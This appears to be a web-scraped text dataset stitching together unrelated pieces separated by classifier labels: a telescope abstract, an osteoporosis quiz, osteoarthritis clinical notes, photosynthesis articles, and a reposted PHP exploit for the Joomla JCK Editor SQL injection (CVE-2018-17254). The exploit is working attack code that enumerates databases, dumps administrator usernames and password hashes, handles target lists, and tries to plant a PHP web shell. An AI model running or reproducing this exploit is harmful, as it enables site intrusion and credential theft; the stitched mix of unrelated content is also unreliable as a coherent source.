of patients. Article provided by PodiatryNetwork.com. DISCLAIMER: *MATERIAL ON THIS SITE IS BEING PROVIDED FOR EDUCATIONAL AND INFORMATION PURPOSES AND IS NOT MEANT TO REPLACE THE DIAGNOSIS OR CARE PROVIDED BY YOUR OWN MEDICAL PROFESSIONAL. This information should not be used for diagnosing or treating a health problem or disease or prescribing any medication. Visit a health care professional to proceed with any treatment for a health problem.
__label__pos
0.628747
Mono and stereo performance of the two SST-1M telescope prototypes Jakub Jurysek (on behalf of SST-1M Group), ICRC 2023, Nagoya, Japan, 26. 7. – 3. 8. 2023 The Single-Mirror Small-Sized Telescope, or SST-1M, was originally developed as a prototype of a small-sized telescope for CTA, designed to form an array for observations of gamma-ray-induced atmospheric showers for energies above 3 TeV. A pair of SST-1M telescopes is currently being commissioned at the Ondrejov Observatory in the Czech Republic, and the telescope capabilities for mono and stereo observations are being tested in better astronomical conditions. The final location for the telescopes will be decided based on these tests. In this contribution, we present a data analysis pipeline called sst1mpipe, and the performance of the telescopes when working independently and in a stereo regime. [ Read the contribution PDF … ]
__label__pos
0.944565
How Well Do You Know Osteoporosis? Few people are aware of the true impact of osteoporosis, and yet many will suffer from it at some point in their lives. Related to a decline in bone mass density that can result in fractures, the condition currently affects about two million Canadians. It’s chronic, it’s hard to detect, and its effects can be catastrophic: 28 per cent of women and 37 per cent of men will die within a year of suffering an osteoporotic hip fracture. So how can you avoid this serious condition and continue to live happily and healthily? The first step is to talk to your doctor about taking a 10-year risk assessment. But before you do that, take this quiz. It’ll help you learn a little more about osteoporosis and dispel some of the misconceptions about the disease. True or False: Bone loss is a natural part of aging. True. Women generally experience peak bone mass by the age of 20, while men attain it by 25. Both groups begin to lose their bone mass in their thirties. If left unchecked, their bones can wear away, leaving them vulnerable to osteoporotic fractures and breaks. True or False: Men are vulnerable to osteoporosis. True. While men are less likely to suffer from osteoporosis, at least one-in-five will suffer a bone break due to the condition. True or False: There’s no link between height loss or osteoporosis. False. If a patient suffers a sudden height loss of more than two centimeters, it may indicate a spine fracture due to osteoporosis. People over 50 should be mindful of their height and speak to their healthcare professional if they notice any drastic changes. True or False: Family history is irrelevant in an osteoporosis risk assessment. False. Osteoporosis among first-degree relatives, particularly parental hip fractures, can be a key indicator in determining your risk. True or False: Other medications can have a negative effect on your bone health. True. The side effects of certain drugs may impact bone health. Be sure to mention your current medications when discussing osteoporosis with your doctor. After reading this article, are you more likely to speak to your doctor about getting a 10-year fracture risk assessment? Sign up for E-Alerts
__label__pos
0.787959
OA Osteoarthritis search Osteoarthritis, Osteoarthrosis, Degenerative Joint Disease, DJD • Epidemiology 1. Most common form of Arthritis 2. Associated functional Impairment increases with age 3. Prevalence directly increases with age 1. Age over 40 years: 70% of U.S. population 2. Age over 65 years: 80% of U.S. population 3. See Rheumatologic Conditions in the Elderly • Pathophysiology 1. Primary lesion resides in the articular cartilage 1. Abnormal cartilage repair and remodeling 2. Chondrocytes produce proteolytic enzymes 3. Proteolytic enzymes destroy cartilage 2. End result 1. Asymmetric joint cartilage loss 2. Subchondral sclerosis (bone density increased) 3. Subchondral cysts 4. Marginal osteophytes • Risk Factors 1. Age over 50 years old 2. Female gender 3. Obesity 4. Prior joint injury 5. Job duties with frequent squatting or bending 6. Osteoarthritis Family History 7. Repetitive-impact sports (e.g. soccer, football) • Etiologies 1. Primary 1. Weight bearing joints 1. Hands 2. Hips, Knees, and feet 2. Stressors 1. Obesity (single most important factor) 2. Overuse injuries 2. Secondary 1. Acute or Chronic Trauma 2. History of knee meniscectomy 3. Congenital abnormalities 4. Rheumatic Conditions 1. Gouty Arthritis 2. Rheumatoid Arthritis 3. Calcium pyrophosphate deposition disease (CPPD) 5. Endocrine Conditions 1. Diabetes Mellitus 2. Acromegaly • Symptoms 1. Pain worse later in the day, and better with rest 1. Pain on motion that worsens with increasing joint usage (gelling) 2. If morning stiffness is present, is of short duration (<30 minutes) 1. Contrast with Rheumatoid Arthritis which has morning stiffness >30 minutes 2. Slowly progressive deformity and variably painful 1. Initial high-use Joint Pain relieved with rest 2. Next, pain is constant on affected joint usage 3. Eventually pain occurs at rest and at night 3. No systemic manifestations 1. No Fatigue 2. No generalized weakness 4. Associated muscle spasm, contractures and atrophy 5. Symptoms uncommon before age 40 years old 6. Asymmetric involvement • Signs 1. Joint Exam 1. Joint Effusion 2. Atrophy 3. Joint instability 4. Joint tenderness 5. Crepitation 6. Limited range of motion 2. Joints spared (Contrast with Rheumatoid Arthritis) 1. Wrist spared 2. Metacarpal-phalangeal joints spared (except thumb) 3. Elbow spared 4. Ankle spared (variable involvement) 3. Joints commonly involved 1. See Shoulder Osteoarthritis 2. See Acromioclavicular Osteoarthritis 3. See Knee Osteoarthritis 4. See Hip Osteoarthritis 5. See Foot Osteoarthritis 6. See Hand Osteoarthritis 1. Distal interphalangeal joints (Heberden's Nodes) 2. Proximal interphalangeal joints (Bouchard's Nodes) 3. First carpometacarpal joint (thumb) 7. Cervical and Lumbar Spine 1. Mechanisms 1. Apophyseal joint Arthritis and Osteophytes 2. Disc degeneration 2. Secondary affects 1. Local muscle spasm 2. Nerve root impingement with radiculopathy 3. Cervical stenosis 4. Lumbar Stenosis (Pseudoclaudication) • Labs • General (if indicated) 1. Routine labs are not indicated in typical Osteoarthritis 1. Obtain for unclear diagnosis 2. Abnormal results suggest alternative diagnosis 2. Erythrocyte Sedimentation Rate normal 3. C-Reactive Protein normal 4. Rheumatoid Factor negative 5. Uric Acid normal 1. Synovial Fluid appearance 1. Clear fluid 2. High viscosity and good mucin 2. Synovial Fluid Crystals 1. Basic Calcium Phosphate (BCP) Crystals 2. Apatite crystals 3. Synovial Fluid White Blood Cell Count 1. Non-Inflammatory fluid: 200 - 2000 WBC/mm3 2. WBC Count usually <500 cells (mostly mononuclear) • Imaging 1. Imaging is not required for Osteoarthritis diagnosis in patients with typical presentations 1. XRay, MRI Imaging often does not correlate with Osteoarthritis severity and patient function 1. Kim (2015) BMJ 351:h5983 +PMID:26631296 [PubMed] 2. Imaging indicated for pre-operative evaluation or if other diagnosis considered 1. Joint Trauma 2. Joint Pain at night 3. Progressive Joint Pain 4. Family History of other arthritic conditions 5. Age under 18 years 3. Findings 1. See Osteoarthritis XRay 2. See Foot XRay in Osteoarthritis 3. See Hand XRay in Osteoarthritis 4. See Hip XRay in Osteoarthritis 5. See Knee XRay in Osteoarthritis 6. See Spine XRay in Osteoarthritis • Management • Non-Pharmacologic Treatment 1. See Knee Osteoarthritis for Muscle Strengthening 2. Reduce Obesity 1. Weight loss of 5% from baseline or 6 kg (13 pounds) decreases pain and Disability 3. Physical Therapy 4. Physiotherapy (Heat, Cold, Contrast Baths or Ultrasound) 1. TENS not found to be effective 5. Consider comorbidity 1. See Depression in the Elderly 6. Exercise Program (do not exacerbate symptoms) 1. Stretching 2. Mild aerobic, active, Isometric Exercise (eliptical trainer, Bicycle) 3. Swimming 1. Highly effective Exercise for strength, flexibility and aerobic fitness 4. Tai chi 1. Song (2003) J Rheumatol 30:2039-44 [PubMed] 7. Joint protection 8. Work and home modified in severe disease 1. Limit weight bearing on affected joints 2. Walk Aids (Canes and Walkers) 9. Surgery 1. Hip replacement or knee replacement in refractory cases • Management • Pharmacologic Management 1. Acetaminophen (Tylenol) 1 gram orally twice daily (limit to 2-3 grams daily) 1. Less effective than NSAIDs, but safer 2. NSAIDs 1. Cautious use in age over 65 years, prior GI Bleed, Aspirin, Plavix, Warfarin or Corticosteroid 1. Consider with Proton Pump Inhibitor if 1-2 GI risks 2. Avoid NSAIDs completely if 3 or more GI risks 2. Avoid Feldene - higher risk of GI toxicity 3. Naproxen may have less cardiovascular risks 4. Observe for CNS effects (esp. Indomethacin) 5. Consider topical diclofenac (see below) 6. Switch classes when one NSAID is not effective 1. Diclofenac (Voltaren) 50 mg two to three times daily 2. NaproxenSodium (Naprosyn) 500 mg orally twice daily 3. Ibuprofen (Advil) 600 mg three times daily 4. Meloxicam (Mobic) 15 mg daily 5. Nabumetone (Relafen) 500 mg twice daily 6. Sulindac (Clinoril) 200 mg twice daily 3. COX2 Inhibitors 1. Celecoxib (Celebrex) 200 mg daily 2. No advantages to standard NSAIDs and still very expensive 4. Topical agents 1. Topical diclofenac 1. May be as effective as oral NSAIDs if only a few joints involved 2. Expensive and risk of skin reaction 2. Topical Capsaicin cream 1. Effective for refractory Joint Pain 2. Poorly tolerated 3. Avoid topical Salicylates such as Bengay (ineffective for Osteoarthritis) 5. Intraarticular agents 1. Intra-articular Corticosteroid injection 1. Avoid more than 3-4 times per year 2. Sodium hyaluronate (Synvisc) in Knee Osteoarthritis 6. Other systemic Analgesics 1. Tramadol (Ultram) 1. Effective, but with risks (NNT 6, NNH 8) 2. Cepeda (2007) J Rheumatol 34(3): 543-55 [PubMed] 2. Duloxetine (Cymbalta) 1. Effective, but with moderate Nausea risk (NNT 7, NNH 6) 2. Citrome (2012) Postgrad Med 124(1): 83-93 [PubMed] 3. Opioids 1. Generally not recommended due to significant risks • Management • Alternative Medications 1. Possibly effective agents (insufficient evidence to recommend) 1. Dimethyl Sulfoxide (DMSO) 25% applied topically 1. Small, 3 week studies showed reduced pain 2. Devil's Claw 2.4 grams daily 3. Ginger Extract 510 mg daily 4. Methlsulfonylmethane (MSM) 500 mg three times daily 5. S-Adenosylmethionine (SAMe) 200 mg three times daily 1. Methyl donor in proteoglycan synthesis 2. More effective than Placebo for pain, stiffness 3. Very expensive and unstable shelf life (Butanedisulfonate salt is most stable) 6. Glucosamine Sulfate 1. Dosing 1500 mg once daily or 500 mg orally three times daily 2. Effect may be delayed for 2 months 3. Initial studies demonstrated benefit 1. Towheed (2005) Cochrane Database Syst Rev (2):CD002946 [PubMed] 2. Richy (2003) Arch Intern Med 163(13):1514-22 [PubMed] 4. Later studies show no significant benefit 1. Roman-blas (2017) Arthritis Rheumatol 69(1): 77-85 [PubMed] 2. Wilkins (2010) JAMA 304(1):45-52 [PubMed] 2. Unknown benefit (anecdotal, inconclusive data or only small studies support) 1. Avocado-soybean unsaponifiables 300 mg daily 2. Boron supplementation 1. Effects Calcium Metabolism in bones, joints 2. Higher Arthritis rates with low boron intake 3. Cetyl Myristoleate (anti-inflammatory effects) 4. Acupuncture 5. FLUIDjoint 1. Concentrated milk proteins from New Zealand 2. Promoted as containing antibodies for Immunity 3. Not recommended due to $50/month and unproven 3. Agents to avoid 1. Agents that are ineffective for Osteoarthritis (but may have other indications) 1. Vitamin D Supplementation 2. Antioxidant supplements 2. Ineffective agents (avoid these based on high quality studies) 1. Chondroitin sulfate 400 mg PO tid 2. Tipi 3. Reumalex 4. Ionized wrist bracelets 5. Osteoarthritis Shoes 3. Preparations with serious adverse effects and either ineffective or unproven efficacy 1. Limbrel (Flavocoxid) 1. Risk of Acute Hepatitis and Hypersensitivity pneumonitis 4. References 1. Morelli (2003) Am Fam Physician 67(2):339-44 [PubMed] 2. Gregory (2008) Am Fam Physician 77(2): 177-84 [PubMed] • Prevention 1. Maintain appropriate body weight 2. Continued moderate joint activity is critical 1. Normal joint use directs cartilage remodeling 2. Decreased joint use risks abnormal cartilage repair 1. Information from your Family Doctor: Staying Active 1. http://www.familydoctor.org/healthfacts/115/
__label__pos
0.99999
Joomla JCK Editor 6.4.4 SQL Injection ≈ Packet Storm – Digitalmunition Exploit/Advisories no-image-featured-image.png Published on March 9th, 2021 📆 | 4863 Views ⚑ 0 Joomla JCK Editor 6.4.4 SQL Injection ≈ Packet Storm # Exploit Title: Joomla JCK Editor 6.4.4 – ‘parent’ SQL Injection (2) # Googke Dork: inurl:/plugins/editors/jckeditor/plugins/jtreelink/ # Date: 05/03/2021 # Exploit Author: Nicholas Ferreira # Vendor Homepage: http://docs.arkextensions.com/downloads/jck-editor # Version: 6.4.4 # Tested on: Debian 10 # CVE : CVE-2018-17254 # PHP version (exploit): 7.3.27 # POC: /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=”%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL–%20aa < ?php $vuln_file = ‘/editors/jckeditor/plugins/jtreelink/dialogs/links.php’; function payload($str1, $str2=””){ return ‘?extension=menu&view=menu&parent=”%20UNION%20SELECT%20NULL,NULL,’.$str1.’,NULL,NULL,NULL,NULL,NULL’.$str2.’–%20aa’; #” } function get_request($url){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); #curl_setopt($ch, CURLOPT_PROXY, “127.0.0.1:8080”); $output = curl_exec($ch); curl_close($ch); return $output; } function parse_columns($columns){ $parsed_columns = array(); foreach($columns as $col){ array_push($parsed_columns, $col); array_push($parsed_columns, “0x242324”); //delimiter = $#$ } return $parsed_columns; } function inject($url, $payload){ global $vuln_file; $request = get_request($url.$vuln_file.$payload); preg_match_all(‘/url =”(.*)”>/’, $request, $output); return $output; } ###### function is_vulnerable($url){ global $vuln_file; $output = inject($url, payload(“0x6861636b6564”)); if(isset($output[1][0])){ if(base64_encode($output[1][0]) == “aGFja2Vk”){ //checking if we can inject return 1; } } return 0; } function get_db_names($url){ global $vuln_file; $db_names = array(); $output = inject($url, payload(“schema_name”, “%20from%20information_schema.schemata”)); foreach($output[1] as $db){ array_push($db_names, $db); } return $db_names; } function get_table_names($url, $db){ global $vuln_file; $table_names = array(); $output = inject($url, payload(“table_name”, “%20from%20information_schema.tables%20WHERE%20table_schema=%27”.$db.”%27″)); foreach($output as $table){ array_push($table_names, $table); } return $table_names; } function get_column_names($url, $table){ global $vuln_file; $column_names = array(); $output = inject($url, payload(“column_name”, “%20from%20information_schema.columns%20WHERE%20table_name=%27”.$table.”%27″)); foreach($output as $column){ array_push($column_names, $column); } return $column_names; } function dump_columns($url, $columns, $dbname, $table){ global $vuln_file; $column_dump = array(); $related_arr = array(); $data = array(); $output = inject($url, payload(“concat(“.implode(‘,’, parse_columns($columns)).”)”, “%20from%20″.$dbname.”.”.$table)); foreach($output[1] as $column){ $exploded = explode(“$#$”, $column); array_push($data, $exploded); } foreach($data as $user_info){ array_pop($user_info); array_push($related_arr, array_combine($columns, $user_info)); } return $related_arr; } function rce($url){ //probably won’t work =( global $vuln_file; if(!is_vulnerable($url)){ die(red(“[-] Target isn’t vulnerable.”)); } $server_root = array(“/var/www/”, “/var/www/html/”, “/usr/local/apache2/htdocs/”, “/var/www/nginx-default/”, “/srv/www/”, “/usr/local/apache2/htdocs/”); $rand_content = “AklOGg8kJ7GfbIuBYfDS2apD4L2vADk8QgODUg2OmDNy2”; $payl0ad = “‘< ?php system($_GET[0]); ?> “.$rand_content.”‘”; $filename = rand(1000, 7359).”.php”; echo cyan(“[i]”).” Trying to upload a RCE shell…n”; foreach($server_root as $path){ inject($url, payload($payl0ad, ” INTO OUTFILE ‘”.$path.$filename.”‘”)); } $get_shell = get_request($url.”/”.$filename); if(strpos($get_shell, $rand_content) !== false){ echo green(“[+] RCE shell successfully uploaded! =)n”); die(“Usage: “.$url.”/”.$filename.”?0=whoamin”); }else{ echo(red(“[-] “).”Could not upload RCE shell. Maybe stacked queries are not supported. =(n”); die(cyan(“[i] “).”But you can still inject SQL commands! What about dumping the users table? =)n”); } } function read_file($url, $file){ global $vuln_file; } ############ function green($str){ return “e[92m”.$str.”e[0m”; } function red($str){ return “e[91m”.$str.”e[0m”; } function yellow($str){ return “e[93m”.$str.”e[0m”; } function cyan($str){ return “e[96m”.$str.”e[0m”; } function banner(){ echo “ ___ _____ _ __ _____ |_ |/ __ | | / /| _ | || / /| |/ / | | | | _ _ _ __ ___ _ __ ___ _ _ | || | | | | | || | | || ‘_ ` _ | ‘_ / _ | ‘__| /__/ /| __/| | | |/ / | |_| || | | | | || |_) || __/| | ____/ ____/_| _/|___/ __,_||_| |_| |_|| .__/ ___||_| “.green(“Coder: “).yellow(“Nicholas Ferreira”).” | | |_| “; } $target = 0; $rce = 0; function check(){ global $argv; global $argc; global $target; global $rce; global $target_list; global $save_output; global $verbose; global $less; global $specified_db; $short_args = “u:t:v::h::l::r::d::”; $long_args = array(“url:”,”targets::”,”verbose::”,”help::”,”less::”,”rce::”, “db::”); $options = getopt($short_args, $long_args); if(isset($options[‘h’]) || $argc == 1 || isset($options[‘help’])){ echo “JCK Editor v6.4.4 SQL Injection exploit (CVE-2018-17254) Usage: php “.$argv[0].” -u url [-h] [-v] [-l] [-o] [-r command] [-f list_of_targets] [-d db] -u, –url: Path to Joomla! plugins (e.g. website.com/site/plugins/) -h, –help: Help -v, –verbose: Verbose mode (print tables) -l, –less: Less outputs (only Administrator usernames and passwords) -t, –targets: Load a list of targets -r, –rce: Try to upload a RCE shell -d, –db: Specifies the DB to dump “; } if(isset($options[‘u’])){ $target = $options[‘u’]; }elseif(isset($options[‘url’])){ $target = $options[‘url’]; }else{ $target = “”; } isset($options[‘v’]) || isset($options[‘verbose’]) ? $verbose = 1 : $verbose = 0; isset($options[‘l’]) || isset($options[‘less’]) ? $less = 1 : $less = 0; isset($options[‘r’]) || isset($options[‘rce’]) ? $rce = 1 : $rce = 0; isset($options[‘f’]) ? $target_list = $options[‘f’] : $target_list = 0; if(isset($options[‘t’])){ $target_list = $options[‘t’]; }elseif(isset($options[‘targets’])){ $target_list = $options[‘targets’]; }else{ $target_list = 0; } if(isset($options[‘d’])){ $specified_db = $options[‘d’]; }elseif(isset($options[‘db’])){ $specified_db = $options[‘db’]; }else{ $specified_db = 0; } if(strlen($target_list) < 2){ if($target !== “”){ // check if URL is ok if(!preg_match(‘/^((https?://)|(www.)|(.*))([a-z0-9-].?)+(:[0-9]+)?(/.*)?$/’, $target)){ die(red(“[i] The target must be a URL.n”)); } if(strpos($target, “plugins”) == false){ die(red(“[-] You must provide the Joomla! plugins path! (standard: exemple.com/plugins/)n”)); } }else{ die(cyan(“[-] “).”You can get help with -h.n”); } } if($target_list !== 0){ //check if target list is readable if(!file_exists($target_list)){ die(red(“[-] “).”Could not read target list file.n”); } } } function exploit($url){ // returns users and passwords global $vuln_file; global $verbose; global $rce; global $specified_db; global $less; echo cyan(“n=========================| “.str_replace(“plugins”, “”, $url).” |=========================nnn”); echo cyan(“[+] “).”Checking if target is vulnerable…n”; if (is_vulnerable($url)){ $main_db = inject($url, payload(“database()”))[1]; $user_table = “”; $hostname = inject($url, payload(“@@hostname”))[1]; $mysql_user = inject($url, payload(“user()”))[1]; $mysql_version = inject($url, payload(“@@version”))[1]; $connection_id = inject($url, payload(“connection_id()”))[1]; echo green(“[+] Target is vulnerable! =)nn”); echo cyan(“[i] “).”Hostname: “.yellow($hostname[0]).”n”; echo cyan(“[i] “).”Current database: “.yellow($main_db[0]).”n”; echo cyan(“[i] “).”MySQL version: “.yellow($mysql_version[0]).”n”; echo cyan(“[i] “).”MySQL user: “.yellow($mysql_user[0]).”n”; echo cyan(“[i] “).”Connection ID: “.yellow($connection_id[0]).”nn”; if($rce){ rce($url); } echo cyan(“[+] “).”Getting DB names…n”; $dbs = get_db_names($url); if(count($dbs) == 0){ echo(“[-] There are no DBs available on this target. =(n”); } $db_list = array(); foreach($dbs as $db){ $num_table = count(get_table_names($url, $db)[1]); echo green(“[+] DB found: “).cyan($db.” [“.$num_table.” tables]”).”n”; array_push($db_list, $db); } if($main_db == “” && !$specified_db){ echo(red(“[-] Could not find Joomla! default DB. Try to dump another DB with -d. n”)); } if($specified_db !== 0){ // if user doesn’t specify a custom db echo cyan(“n[+] “).”Getting tables from “.yellow($specified_db).”…n”; $tables = get_table_names($url, $specified_db); }else{ foreach($db_list as $new_db){ if($new_db !== “test” && strlen(strpos($new_db, “information_schema”) !== false) == 0){ // neither test nor i_schema echo cyan(“n[+] “).”Getting tables from “.yellow($new_db).”…n”; $tables = get_table_names($url, $new_db); } } } echo cyan(“[+] “).yellow(count($tables[1])).” tables found! n”; if(count($tables[1]) == 0){ echo(red(“[-] “.”Site is vulnerable, but no tables were found on this DB. Try to dump another DB with -d. n”)); } foreach($tables[1] as $table){ if($verbose) echo $table.”n”; if(strpos($table, “_users”) !== false){ $user_table = $table; } } if($user_table == “”){ echo(red(“[-] Could not find Joomla default users table. Try to find it manually!n”)); } echo cyan(“[+] “).”Getting columns from “.yellow($user_table).”…n”; $columns = get_column_names($url, $user_table); if(count($columns) == 0){ echo(red(“[-] There are no columns on this table… =(n”)); } if($verbose){ echo cyan(“[+] “).”Columns found:n”; foreach($columns[1] as $coll){ echo $coll.”n”; } } echo cyan(“[+] “).”Dumping usernames from “.yellow($user_table).”…n”; $dump = dump_columns($url, array(“id”,”usertype”, “name”,”username”,”password”,”email”,”lastvisitDate”), $db, $user_table); if(is_array($dump) && count($dump) == 0){ $new_dump = dump_columns($url, array(“id”,”name”,”username”,”password”,”email”,”lastvisitDate”), $db, $user_table); if(count($new_dump) == 0){ echo(red(“[-] This table is empty! =(n”)); }else{ $dump = $new_dump; $usertype = 0; } }else{ $usertype = 1; } echo cyan(“n[+] “).”Retrieved data:n”; foreach($dump as $user){ if($usertype){ $adm = strpos($user[‘usertype’], ‘Administrator’) !== false; }else{ $adm = false; } if($less){ if(strpos($user[‘usertype’], “Administrator”) !== false){ echo “n=============== “.green($user[‘username’]).” ===============n”; foreach($user as $key => $data){ if(strlen($data) > 0){ if($key == “username” || $key == “password” || $adm){ echo($key.”: “.red($data).”n”); }else{ echo($key.”: “.$data.”n”); } } } } }else{ echo “n=============== “.green($user[‘username’]).” ===============n”; foreach($user as $key => $data){ if(strlen($data) > 0){ if($key == “username” || $key == “password” || $adm){ echo($key.”: “.red($data).”n”); }else{ echo($key.”: “.$data.”n”); } } } } } echo(green(“nExploit completed! =)nnn”)); }else{ echo(red(“[-] Apparently, the provided target is not vulnerable. =(nn”)); echo(cyan(“[i] “).”This may be a connectivity issue. If you’re persistent, you can try again.n”); } } banner(); check(); if(strlen($target_list) >1){ $targets = explode(PHP_EOL, file_get_contents($target_list)); //split by newline foreach($targets as $website){ if($rce){ rce($target); }else{ if(strlen($website) > 1){ exploit($website); //multiple targets } } } }else{ exploit($target); //single target } ?> Source link Tagged with: Leave a Reply
__label__pos
0.991721
In your own words, define or describe what you already know about photosynthesis Photosynthesis is the process used by plants, algae and certain bacteria to harness energy from sunlight and turn it into chemical energy. Here, we describe the general principles of photosynthesis and highlight how scientists are studying this natural process to help develop clean fuels and sources of renewable energy. Contents Types of photosynthesis There are two types of photosynthetic processes: oxygenic photosynthesis and anoxygenic photosynthesis. The general principles of anoxygenic and oxygenic photosynthesis are very similar, but oxygenic photosynthesis is the most common and is seen in plants, algae and cyanobacteria. During oxygenic photosynthesis, light energy transfers electrons from water (H2O) to carbon dioxide (CO2), to produce carbohydrates. In this transfer, the CO2 is “reduced,” or receives electrons, and the water becomes “oxidized,” or loses electrons. Ultimately, oxygen is produced along with carbohydrates. Oxygenic photosynthesis functions as a counterbalance to respiration by taking in the carbon dioxide produced by all breathing organisms and reintroducing oxygen to the atmosphere. On the other hand, anoxygenic photosynthesis uses electron donors other than water. The process typically occurs in bacteria such as purple bacteria and green sulfur bacteria, which are primarily found in various aquatic habitats. “Anoxygenic photosynthesis does not produce oxygen — hence the name,” said David Baum, professor of botany at the University of Wisconsin-Madison. “What is produced depends on the electron donor. For example, many bacteria use the bad-eggs-smelling gas hydrogen sulfide, producing solid sulfur as a byproduct.” Though both types of photosynthesis are complex, multistep affairs, the overall process can be neatly summarized as a chemical equation. Oxygenic photosynthesis is written as follows: 6CO2 + 12H2O + Light Energy → C6H12O6 + 6O2 + 6H2O Here, six molecules of carbon dioxide (CO2) combine with 12 molecules of water (H2O) using light energy. The end result is the formation of a single carbohydrate molecule (C6H12O6, or glucose) along with six molecules each of breathable oxygen and water. Similarly, the various anoxygenic photosynthesis reactions can be represented as a single generalized formula: CO2 + 2H2A + Light Energy → + 2A + H2O The letter A in the equation is a variable and H2A represents the potential electron donor. For example, A may represent sulfur in the electron donor hydrogen sulfide (H2S), explained Govindjee and John Whitmarsh, plant biologists at the University of Illinois at Urbana-Champaign, in the book “Concepts in Photobiology: Photosynthesis and Photomorphogenesis” (Narosa Publishers and Kluwer Academic, 1999). Plants need energy from sunlight for photosynthesis to occur. (Image credit: ) The photosynthetic apparatus The following are cellular components essential to photosynthesis. Pigments Pigments are molecules that bestow color on plants, algae and bacteria, but they are also responsible for effectively trapping sunlight. Pigments of different colors absorb different wavelengths of light. Below are the three main groups. • Chlorophylls: These green-colored pigments are capable of trapping blue and red light. Chlorophylls have three subtypes, dubbed chlorophyll a, chlorophyll b and chlorophyll c. According to Eugene Rabinowitch and Govindjee in their book “Photosynthesis”(Wiley, 1969), chlorophyll a is found in all photosynthesizing plants. There is also a bacterial variant aptly named bacteriochlorophyll, which absorbs infrared light. This pigment is mainly seen in purple and green bacteria, which perform anoxygenic photosynthesis. • Carotenoids: These red, orange or yellow-colored pigments absorb bluish-green light. Examples of carotenoids are xanthophyll (yellow) and carotene (orange) from which carrots get their color. • Phycobilins: These red or blue pigments absorb wavelengths of light that are not as well absorbed by chlorophylls and carotenoids. They are seen in cyanobacteria and red algae. Plastids Photosynthetic eukaryotic organisms contain organelles called plastids in their cytoplasm. The double-membraned plastids in plants and algae are referred to as primary plastids, while the multiple-membraned variety found in plankton are called secondary plastids, according to an articlein the journal Nature Education by Cheong Xin Chan and Debashish Bhattacharya, researchers at Rutgers University in New Jersey. Plastids generally contain pigments or can store nutrients. Colorless and nonpigmented leucoplasts store fats and starch, while chromoplasts contain carotenoids and chloroplasts contain chlorophyll, as explained in Geoffrey Cooper’s book, “The Cell: A Molecular Approach” (Sinauer Associates, 2000). Photosynthesis occurs in the chloroplasts; specifically, in the grana and stroma regions. The grana is the innermost portion of the organelle; a collection of disc-shaped membranes, stacked into columns like plates. The individual discs are called thylakoids. It is here that the transfer of electrons takes place. The empty spaces between columns of grana constitute the stroma. Chloroplasts are similar to mitochondria, the energy centers of cells, in that they have their own genome, or collection of genes, contained within circular DNA. These genes encode proteins essential to the organelle and to photosynthesis. Like mitochondria, chloroplasts are also thought to have originated from primitive bacterial cells through the process of endosymbiosis. “Plastids originated from engulfed photosynthetic bacteria that were acquired by a single-celled eukaryotic cell more than a billion years ago,” Baum told Live Science. Baum explained that the analysis of chloroplast genes shows that it was once a member of the group cyanobacteria, “the one group of bacteria that can accomplish oxygenic photosynthesis.” In their 2010 article, Chan and Bhattacharya make the point that the formation of secondary plastids cannot be well explained by endosymbiosis of cyanobacteria, and that the origins of this class of plastids are still a matter of debate. Antennae Pigment molecules are associated with proteins, which allow them the flexibility to move toward light and toward one another. A large collection of 100 to 5,000 pigment molecules constitutes “antennae,” according to an article by Wim Vermaas, a professor at Arizona State University. These structures effectively capture light energy from the sun, in the form of photons. Ultimately, light energy must be transferred to a pigment-protein complex that can convert it to chemical energy, in the form of electrons. In plants, for example, light energy is transferred to chlorophyll pigments. The conversion to chemical energy is accomplished when a chlorophyll pigment expels an electron, which can then move on to an appropriate recipient. Reaction centers The pigments and proteins, which convert light energy to chemical energy and begin the process of electron transfer, are known as reaction centers. The photosynthetic process The reactions of plant photosynthesis are divided into those that require the presence of sunlight and those that do not. Both types of reactions take place in chloroplasts: light-dependent reactions in the thylakoid and light-independent reactions in the stroma. Light-dependent reactions (also called light reactions): When a photon of light hits the reaction center, a pigment molecule such as chlorophyll releases an electron. “The trick to do useful work, is to prevent that electron from finding its way back to its original home,” Baum told Live Science. “This is not easily avoided, because the chlorophyll now has an ‘electron hole’ that tends to pull on nearby electrons.” The released electron manages to escape by traveling through an electron transport chain, which generates the energy needed to produce ATP (adenosine triphosphate, a source of chemical energy for cells) and NADPH. The “electron hole” in the original chlorophyll pigment is filled by taking an electron from water. As a result, oxygen is released into the atmosphere. Light-independent reactions (also called dark reactions and known as the Calvin cycle): Light reactions produce ATP and NADPH, which are the rich energy sources that drive dark reactions. Three chemical reaction steps make up the Calvin cycle: carbon fixation, reduction and regeneration. These reactions use water and catalysts. The carbon atoms from carbon dioxide are “fixed,” when they are built into organic molecules that ultimately form three-carbon sugars. These sugars are then used to make glucose or are recycled to initiate the Calvin cycle again. This June 2010 satellite photo shows ponds growing algae in southern California. (Image credit: PNNL, QuickBird satellite) Photosynthesis in the future Photosynthetic organisms are a possible means to generate clean-burning fuels such as hydrogen or even methane. Recently, a research group at the University of Turku in Finland, tapped into the ability of green algae to produce hydrogen. Green algae can produce hydrogen for a few seconds if they are first exposed to dark, anaerobic (oxygen-free) conditions and then exposed to light The team devised a way to extend green algae’s hydrogen production for up to three days, as reported in their 2018 study published in the journal Energy & Environmental Science. Scientists have also made advances in the field of artificial photosynthesis. For instance, a group of researchers from the University of California, Berkeley, developed an artificial system to capture carbon dioxide using nanowires, or wires that are a few billionths of a meter in diameter. The wires feed into a system of microbes that reduce carbon dioxide into fuels or polymers by using energy from sunlight. The team published its design in 2015 in the journal Nano Letters. In 2016, members of this same group published a study in the journal Science that described another artificial photosynthetic system in which specially engineered bacteria were used to create liquid fuels using sunlight, water and carbon dioxide. In general, plants are only able to harness about one percent of solar energy and use it to produce organic compounds during photosynthesis. In contrast, the researchers’ artificial system was able to harness 10 percent of solar energy to produce organic compounds. Continued research of natural processes, such as photosynthesis, aids scientists in developing new ways to utilize various sources of renewable energy. Seeing as sunlight, plants and bacteria are all ubiquitous, tapping into the power of photosynthesis is a logical step for creating clean-burning and carbon-neutral fuels. Additional resources: • University of California, Berkeley: Photosynthetic Pigments • Arizona State University: An Introduction to Photosynthesis and Its Applications • University of Illinois at Urbana-Champaign: What Is Photosynthesis? Photosynthesis for Kids What is Photosynthesis? The word photosynthesis can be separated to make two smaller words: “photo” which means light “synthesis” which means putting together Plants need food but they do not have to wait on people or animals to provide for them. Most plants are able to make their own food whenever they need it. This is done using light and the process is called 